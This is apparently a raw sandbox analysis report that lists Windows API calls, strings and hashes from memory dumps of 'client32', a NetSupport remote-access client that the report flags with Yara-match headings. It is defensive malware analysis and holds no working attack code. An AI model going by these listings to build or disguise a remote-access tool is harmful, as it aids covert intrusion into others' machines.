                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                                                                • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                                                • API String ID: 4242130455-3745656997
                                                                                                                • Opcode ID: 3ae6bce2a60a0fdfd5c31868ef0703f6b2060c5edf3e3339330c26d0fdaec795
                                                                                                                • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                                                                • Opcode Fuzzy Hash: 3ae6bce2a60a0fdfd5c31868ef0703f6b2060c5edf3e3339330c26d0fdaec795
                                                                                                                • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                • wsprintfA.USER32 ref: 11028814
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                                                                • wsprintfA.USER32 ref: 11028891
                                                                                                                • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                                                                • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                                • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                • API String ID: 512045693-419896573
                                                                                                                • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                                                • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                                                • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                                                • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(PCIINV.DLL,0BAD89F8,02FB8970,02FB8960,?,00000000,1118368C,000000FF,?,11032002,02FB8970,00000000,?,?,?), ref: 11086115
                                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7774C3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                                                                • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                                                                • wsprintfA.USER32 ref: 110861EB
                                                                                                                • wsprintfA.USER32 ref: 11086202
                                                                                                                • wsprintfA.USER32 ref: 11086219
                                                                                                                • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,771AF550,?,?,11086390,?,11032002,02FB8970,00000000,?,?,?), ref: 11085D68
                                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,771AF550,?,?,11086390,?,11032002,02FB8970,00000000,?,?,?), ref: 11085D7B
                                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,771AF550,?,?,11086390,?,11032002,02FB8970,00000000,?,?,?), ref: 11085D8E
                                                                                                                  • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,771AF550,?,?,11086390,?,11032002,02FB8970,00000000,?,?,?), ref: 11085DA1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                                • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                • API String ID: 4263811268-2492245516
                                                                                                                • Opcode ID: 9add6b772f8b96242f208600117685c77274ddd20eb7f7d58a35d558fcdd73aa
                                                                                                                • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                                                • Opcode Fuzzy Hash: 9add6b772f8b96242f208600117685c77274ddd20eb7f7d58a35d558fcdd73aa
                                                                                                                • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                                                APIs
                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                                                • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                • API String ID: 2061479752-1320826866
                                                                                                                • Opcode ID: 1d9f851f1a35bbda09da46747162988cfd9d26cfc3fdf28e12350a95bf7e0c46
                                                                                                                • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                                                • Opcode Fuzzy Hash: 1d9f851f1a35bbda09da46747162988cfd9d26cfc3fdf28e12350a95bf7e0c46
                                                                                                                • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                                                                APIs
                                                                                                                • __set_flsgetvalue.MSVCR100(6CEF1DE0,00000008,6CEF1E16,00000001,?), ref: 6CEF1D6A
                                                                                                                  • Part of subcall function 6CEF0341: TlsGetValue.KERNEL32(?,6CEF0713), ref: 6CEF034A
                                                                                                                • TlsGetValue.KERNEL32(6CEF1DE0,00000008,6CEF1E16,00000001,?), ref: 6CEF1D7B
                                                                                                                • _calloc_crt.MSVCR100(00000001,00000214), ref: 6CEF1D8E
                                                                                                                • DecodePointer.KERNEL32(00000000), ref: 6CEF1DAC
                                                                                                                • _initptd.MSVCR100(00000000,00000000), ref: 6CEF1DBE
                                                                                                                  • Part of subcall function 6CEF1E9B: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6CEF1F38,00000008,6CF175E9,00000000,00000000), ref: 6CEF1EAC
                                                                                                                  • Part of subcall function 6CEF1E9B: _lock.MSVCR100(0000000D), ref: 6CEF1EE0
                                                                                                                  • Part of subcall function 6CEF1E9B: InterlockedIncrement.KERNEL32(?), ref: 6CEF1EED
                                                                                                                  • Part of subcall function 6CEF1E9B: _lock.MSVCR100(0000000C), ref: 6CEF1F01
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CEF1DC5
                                                                                                                • __freeptd.LIBCMT ref: 6CEF2971
                                                                                                                • __heap_init.LIBCMT ref: 6CEFB8B1
                                                                                                                • GetCommandLineA.KERNEL32(6CEF1DE0,00000008,6CEF1E16,00000001,?), ref: 6CEFB8E2
                                                                                                                • GetCommandLineW.KERNEL32 ref: 6CEFB8ED
                                                                                                                • __ioterm.LIBCMT ref: 6CF07B7E
                                                                                                                • free.MSVCR100(00000000), ref: 6CF17485
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710952050.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710934142.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3711022108.000000006CF94000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3711041416.000000006CF96000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3711061539.000000006CF99000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6cee0000_client32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
                                                                                                                • String ID: (8
                                                                                                                • API String ID: 2121586863-1983883597
                                                                                                                • Opcode ID: 0164ae6c8e0ba914ef95c4d87216acc5ed57a66cb1d50801528ef3b732c654a6
                                                                                                                • Instruction ID: 427bf8f2cd18e94b4a6afeab337c5383fc064dad188fd5ce60383cbb4fcbf10d
                                                                                                                • Opcode Fuzzy Hash: 0164ae6c8e0ba914ef95c4d87216acc5ed57a66cb1d50801528ef3b732c654a6
                                                                                                                • Instruction Fuzzy Hash: 4931D2B1B49646DADF502FFA891068E3AB4EF4775E730151BE474C5E44DF32C046AA22
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                                                  • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                  • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                  • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                  • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                  • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                                                                • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                                                                • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                                                                • GetDC.USER32(00000000), ref: 11134E13
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                                                                • CreateWindowExA.USER32(00000001,NSMWClass,02FA0600,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                • String ID: F(t$CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                • API String ID: 1594747848-3627231027
                                                                                                                • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                                                • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                                                                • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                                                • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                                                                APIs
                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,0BAD89F8,?,00000000,00000000), ref: 1102D594
                                                                                                                • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                                                • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                • API String ID: 83693535-1096744297
                                                                                                                • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                                                • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                                                • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                                                • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                                                • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                                                  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                                                • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                                                  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                                • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                • API String ID: 596640303-1725438197
                                                                                                                • Opcode ID: 82ce7ff8cbb2b5358d8abc1fced85d0fa1010a380384f47bd129b7024de676e6
                                                                                                                • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                                                                • Opcode Fuzzy Hash: 82ce7ff8cbb2b5358d8abc1fced85d0fa1010a380384f47bd129b7024de676e6
                                                                                                                • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                                                  • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
                                                                                                                  • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
